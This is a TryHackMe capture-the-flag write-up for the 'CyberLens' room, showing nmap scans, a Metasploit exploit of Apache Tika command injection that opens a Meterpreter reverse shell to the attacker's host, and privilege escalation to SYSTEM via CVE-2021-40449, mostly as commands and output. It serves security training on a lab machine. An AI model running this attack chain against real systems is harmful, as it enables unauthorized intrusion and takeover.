🥽CyberLens

Date: May 18th, 2024, Author: Anthony J. Saab

License

The following post by anthonyjsaab is licensed under CC BY 4.0

0 - Introduction

Link to room: https://tryhackme.com/r/room/cyberlensp6

Machine version: CyberLens_v7

This writeup walks you through a room on TryHackMe created by tryhackme, TeneBrae93, and tgreenMWR

1 - Port Scans

1a - Discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 20:09 EEST
Nmap scan report for cyberlens.thm (10.10.197.190)
Host is up (0.12s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49677/tcp open  unknown
61777/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 335.20 seconds

1b - Versioning

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p80,135,139,445,3389,5985,47001,61777 -Pn cyberlens.thm    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 21:10 EEST
Nmap scan report for cyberlens.thm (10.10.41.34)
Host is up (0.13s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-05-18T18:10:14+00:00
|_ssl-date: 2024-05-18T18:10:23+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-17T18:05:59
|_Not valid after:  2024-11-16T18:05:59
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
| http-methods: 
|_  Potentially risky methods: PUT
|_http-cors: HEAD GET
|_http-title: Site doesn't have a title (text/plain).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-18T18:10:15
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.02 seconds

1c - Vulners

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p80,135,139,445,3389,5985,47001,61777 -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 21:12 EEST
Nmap scan report for cyberlens.thm (10.10.41.34)
Host is up (0.14s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
| vulners: 
|   cpe:/a:apache:http_server:2.4.57: 
|     	B0A9E5E8-7CCC-5984-9922-A89F11D6BF38	0.0	https://vulners.com/githubexploit/B0A9E5E8-7CCC-5984-9922-A89F11D6BF38	*EXPLOIT*
|_    	45D138AD-BEC6-552A-91EA-8816914CA7F4	0.0	https://vulners.com/githubexploit/45D138AD-BEC6-552A-91EA-8816914CA7F4	*EXPLOIT*
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
| vulners: 
|   cpe:/a:mortbay:jetty:8.y.z-snapshot: 
|_    	SSV:26121	7.8	https://vulners.com/seebug/SSV:26121	*EXPLOIT*
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.55 seconds

It turns out that port 61777 is Apache Tika 1.17:

2 - Foothold using Apache Tika

┌──(kali㉿kali)-[~]
└─$ sudo msfdb init && msfconsole
[i] Database already started
[i] The database appears to be already configured, skipping initialization
Metasploit tip: You can pivot connections over sessions started with the 
ssh_login modules
                                                  

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v6.4.5-dev                           ]
+ -- --=[ 2413 exploits - 1242 auxiliary - 423 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search Tika

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/windows/http/apache_tika_jp2_jscript         2018-04-25       excellent  Yes    Apache Tika Header Command Injection
   1  post/linux/gather/puppet                             .                normal     No     Puppet Config Gather
   2  auxiliary/scanner/http/wp_gimedia_library_file_read  .                normal     No     WordPress GI-Media Library Plugin Directory Traversal Vulnerability


Interact with a module by name or index. For example info 2, use 2 or use auxiliary/scanner/http/wp_gimedia_library_file_read

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/apache_tika_jp2_jscript) > show options

Module options (exploit/windows/http/apache_tika_jp2_jscript):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      9998             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
                                       0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.126.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/apache_tika_jp2_jscript) > set SRVHOST 10.11.85.12
SRVHOST => 10.11.85.12
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RHOSTS cyberlens.thm
RHOSTS => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RPORT 61777
RPORT => 61777
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set VHOST cyberlens.thm
VHOST => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set LHOST 10.11.85.12
LHOST => 10.11.85.12
msf6 exploit(windows/http/apache_tika_jp2_jscript) > run

[*] Started reverse TCP handler on 10.11.85.12:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress -   8.10% done (7999/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress -  16.19% done (15998/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress -  24.29% done (23997/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress -  32.39% done (31996/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress -  40.48% done (39995/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress -  48.58% done (47994/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress -  56.67% done (55993/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress -  64.77% done (63992/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress -  72.87% done (71991/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress -  80.96% done (79990/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress -  89.06% done (87989/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress -  97.16% done (95988/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Sending stage (176198 bytes) to 10.10.41.34
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Meterpreter session 1 opened (10.11.85.12:4444 -> 10.10.41.34:49786) at 2024-05-18 21:21:57 +0300

meterpreter > shelkl
[-] Unknown command: shelkl. Did you mean shell? Run the help command for more details.
meterpreter > shell
Process 5840 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
cyberlens\cyberlens

C:\Windows\system32>dir C:\Users
dir C:\Users
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users

06/06/2023  07:48 PM    <DIR>          .
06/06/2023  07:48 PM    <DIR>          ..
03/17/2021  03:13 PM    <DIR>          Administrator
11/25/2023  07:31 AM    <DIR>          CyberLens
12/12/2018  07:45 AM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  14,950,584,320 bytes free
C:\Windows\system32>type C:\Users\CyberLens\Desktop\user.txt
type C:\Users\CyberLens\Desktop\user.txt
--SNIP--

3 - PrivEsc

3a - Fixing arch mismatch

meterpreter > sysinfo
Computer        : CYBERLENS
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > ps

Process List
============

 PID   PPID  Name                     Arch  Session  User                 Path
 ---   ----  ----                     ----  -------  ----                 ----
 0     0     [System Process]
 4     0     System
 88    4     Registry
 404   4     smss.exe
 500   796   svchost.exe
 576   564   csrss.exe
 656   644   csrss.exe
 660   796   svchost.exe
 676   564   wininit.exe
 728   644   winlogon.exe
 792   796   svchost.exe
 796   676   services.exe
 820   676   lsass.exe
 920   796   svchost.exe
 940   796   svchost.exe
 960   676   fontdrvhost.exe
 968   728   fontdrvhost.exe
 1032  796   svchost.exe
 1068  728   dwm.exe
 1108  796   svchost.exe
 1228  4136  conhost.exe
 1264  796   svchost.exe
 1280  796   svchost.exe
 1288  796   svchost.exe
 1296  796   svchost.exe
 1372  796   svchost.exe
 1380  796   svchost.exe
 1388  796   svchost.exe
 1396  796   svchost.exe
 1428  796   svchost.exe
 1476  796   svchost.exe
 1496  796   msdtc.exe
 1512  796   svchost.exe
 1524  940   RuntimeBroker.exe        x64   1        CYBERLENS\CyberLens  C:\Windows\System32\RuntimeBroker.exe
 1532  796   svchost.exe
 1540  796   svchost.exe
 1548  796   svchost.exe
 1592  796   svchost.exe
 1640  796   svchost.exe
 1720  796   svchost.exe
 1776  796   svchost.exe
 1784  796   svchost.exe
 1848  796   svchost.exe
 1956  796   svchost.exe
 1976  796   svchost.exe
 2140  796   svchost.exe
 2196  796   svchost.exe
 2208  796   svchost.exe
 2268  796   svchost.exe
 2296  4640  java.exe                 x64   1        CYBERLENS\CyberLens  C:\Program Files\Eclipse Adoptium\jdk-17.0.7.7-hotspot\bin\java.exe
 2312  796   svchost.exe
 2500  796   svchost.exe
 2508  796   svchost.exe
 2608  796   spoolsv.exe
 2628  796   svchost.exe
 2636  796   svchost.exe
 2664  2296  conhost.exe              x64   1        CYBERLENS\CyberLens  C:\Windows\System32\conhost.exe
 2672  796   svchost.exe
 2724  796   svchost.exe
 2732  796   svchost.exe
 2740  796   svchost.exe
 2772  796   svchost.exe
 2780  796   svchost.exe
 2844  2196  sihost.exe               x64   1        CYBERLENS\CyberLens  C:\Windows\System32\sihost.exe
 2868  796   LiteAgent.exe
 2968  1592  taskhostw.exe            x64   1        CYBERLENS\CyberLens  C:\Windows\System32\taskhostw.exe
 3012  796   svchost.exe
 3028  796   svchost.exe
 3084  3464  ctfmon.exe               x64   1
 3452  796   svchost.exe
 3464  796   svchost.exe
 3488  4640  httpd.exe                x64   1        CYBERLENS\CyberLens  C:\Apache24\bin\httpd.exe
 3572  3488  conhost.exe              x64   1        CYBERLENS\CyberLens  C:\Windows\System32\conhost.exe
 3696  796   svchost.exe
 3816  796   svchost.exe
 3868  940   WmiPrvSE.exe
 4004  796   svchost.exe
 4024  796   svchost.exe
 4040  796   svchost.exe
 4060  796   svchost.exe              x64   1        CYBERLENS\CyberLens  C:\Windows\System32\svchost.exe
 4080  796   svchost.exe              x64   1        CYBERLENS\CyberLens  C:\Windows\System32\svchost.exe
 4136  1592  CompatTelRunner.exe
 4180  4164  explorer.exe             x64   1        CYBERLENS\CyberLens  C:\Windows\explorer.exe
 4380  940   ShellExperienceHost.exe  x64   1        CYBERLENS\CyberLens  C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperien
                                                                          ceHost.exe
 4492  940   SearchUI.exe             x64   1        CYBERLENS\CyberLens  C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchU
                                                                          I.exe
 4552  940   RuntimeBroker.exe        x64   1        CYBERLENS\CyberLens  C:\Windows\System32\RuntimeBroker.exe
 4736  940   RuntimeBroker.exe        x64   1        CYBERLENS\CyberLens  C:\Windows\System32\RuntimeBroker.exe
 4908  796   amazon-ssm-agent.exe
 4992  4908  ssm-agent-worker.exe
 5000  4992  conhost.exe
 5140  940   WmiPrvSE.exe
 5164  5904  1GaWil.exe               x86   1        CYBERLENS\CyberLens  C:\Users\CYBERL~1\AppData\Local\Temp\1GaWil.exe
 5176  796   svchost.exe
 5180  5340  conhost.exe              x64   1        CYBERLENS\CyberLens  C:\Windows\System32\conhost.exe
 5456  3488  httpd.exe                x64   1        CYBERLENS\CyberLens  C:\Apache24\bin\httpd.exe
 5756  796   svchost.exe
 5904  5340  cmd.exe                  x64   1        CYBERLENS\CyberLens  C:\Windows\System32\cmd.exe
 6112  1592  taskhostw.exe            x64   1        CYBERLENS\CyberLens  C:\Windows\System32\taskhostw.exe

meterpreter > migrate 4180
[*] Migrating from 5164 to 4180...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer        : CYBERLENS
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

3b - Enum

meterpreter > 
Background session 2? [y/N]  
msf6 exploit(windows/http/apache_tika_jp2_jscript) > use post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) > setg SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.108.65 - Collecting local exploits for x64/windows...
[*] 10.10.108.65 - 193 exploit checks are being tried...
[+] 10.10.108.65 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2021_40449: The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[+] 10.10.108.65 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 45 / 45
[*] 10.10.108.65 - Valid modules for session 2:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/always_install_elevated                  Yes                      The target is vulnerable.
 2   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/cve_2021_40449                           Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
 8   exploit/windows/local/cve_2022_21882_win32k                    Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/cve_2022_21999_spoolfool_privesc         Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 11  exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 12  exploit/windows/local/bits_ntlm_token_impersonation            No                       The target is not exploitable.
 13  exploit/windows/local/bypassuac_eventvwr                       No                       The target is not exploitable.
 14  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 15  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 16  exploit/windows/local/capcom_sys_exec                          No                       Cannot reliably check exploitability.
 17  exploit/windows/local/cve_2019_1458_wizardopium                No                       The target is not exploitable.
 18  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
 19  exploit/windows/local/cve_2020_0796_smbghost                   No                       The target is not exploitable.
 20  exploit/windows/local/cve_2020_1054_drawiconex_lpe             No                       The target is not exploitable. No target for win32k.sys version 10.0.17763.557
 21  exploit/windows/local/cve_2020_1313_system_orchestrator        No                       The target is not exploitable.
 22  exploit/windows/local/cve_2020_17136                           No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
 23  exploit/windows/local/cve_2021_21551_dbutil_memmove            No                       The target is not exploitable.
 24  exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver  No                       The target is not exploitable.
 25  exploit/windows/local/cve_2023_21768_afd_lpe                   No                       The target is not exploitable. The exploit only supports Windows 11 22H2
 26  exploit/windows/local/cve_2023_28252_clfs_driver               No                       The target is not exploitable.
 27  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 28  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 29  exploit/windows/local/lexmark_driver_privesc                   No                       The target is not exploitable. No Lexmark print drivers in the driver store
 30  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows Server 2019 (10.0 Build 17763). is not vulnerable
 31  exploit/windows/local/ms14_058_track_popup_menu                No                       Cannot reliably check exploitability.
 32  exploit/windows/local/ms15_051_client_copy_image               No                       The target is not exploitable.
 33  exploit/windows/local/ms15_078_atmfd_bof                       No                       Cannot reliably check exploitability.
 34  exploit/windows/local/ms16_014_wmi_recv_notif                  No                       The target is not exploitable.
 35  exploit/windows/local/ms16_075_reflection                      No                       The target is not exploitable.
 36  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 37  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.
 38  exploit/windows/local/nvidia_nvsvc                             No                       The check raised an exception.
 39  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 40  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 41  exploit/windows/local/srclient_dll_hijacking                   No                       The target is not exploitable. Target is not Windows Server 2012.
 42  exploit/windows/local/tokenmagic                               No                       The target is not exploitable.
 43  exploit/windows/local/virtual_box_opengl_escape                No                       The target is not exploitable.
 44  exploit/windows/local/webexec                                  No                       The check raised an exception.
 45  exploit/windows/local/win_error_cve_2023_36874                 No                       The target is not exploitable.

[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >

#7 seems very promising

3c - PrivEsc

[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/cve_2021_40449
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_40449) > run

[*] Started reverse TCP handler on 10.11.85.12:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[*] Launching netsh to host the DLL...
[+] Process 5340 launched.
[*] Reflectively injecting the DLL into 5340...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (201798 bytes) to 10.10.108.65
[*] Meterpreter session 3 opened (10.11.85.12:4444 -> 10.10.108.65:49810) at 2024-05-19 11:02:02 +0300

meterpreter > shell
Process 5372 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

3d - Flag

C:\Windows\system32>cd C:\
cd C:\

C:\>dir /s admin.txt
dir /s admin.txt
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\Administrator\Desktop

11/27/2023  07:50 PM                24 admin.txt
               1 File(s)             24 bytes

PreviousCreative NextDreaming

Last updated 1 year ago

hashtagLicense

hashtag0 - Introduction

hashtag1 - Port Scans

hashtag1a - Discovery

hashtag1b - Versioning

hashtag1c - Vulners

hashtag2 - Foothold using Apache Tika

hashtag3 - PrivEsc

hashtag3a - Fixing arch mismatch

hashtag3b - Enum

hashtag3c - PrivEsc

hashtag3d - Flag